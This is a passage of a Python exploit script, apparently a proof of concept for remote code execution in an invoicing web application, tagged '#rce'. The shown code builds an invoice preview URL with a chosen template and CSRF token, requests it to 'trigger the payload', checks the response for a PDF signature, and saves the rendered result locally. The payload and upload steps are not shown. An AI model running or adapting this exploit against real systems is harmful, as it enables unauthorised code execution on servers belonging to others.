            rendererURL \= f"{BASE\_URL}/invoice/preview/{customer\_id}/{preview\_id}?searchTerm=&daterange=&exported=1&template={temp\_id}&invoiceDate=&\_token={csrf}&customers\[\]={customer\_id}"
            \# trigger the payload by visiting the renderer URL 
            rce \= session.get(rendererURL)
            
            if "PDF-1.4" in rce.text:
                print(rendererURL)
                print("\[+\] successfully executed payload")
                \# save the pdf locally since rendered URL will expire as soon as we end the session
                pdf \= f"{generate()}.pdf"
                with open(pdf,'wb') as pdfFile:
                    pdfFile.write(rce.content)
                    pdfFile.flush()
                    pdfFile.close()
                    print(f"\[+\] Saved results with name: {pdf}")
                exit(1)

print("\[-\] Failed to execute payload, try to trigger manually..")

Tag

#rce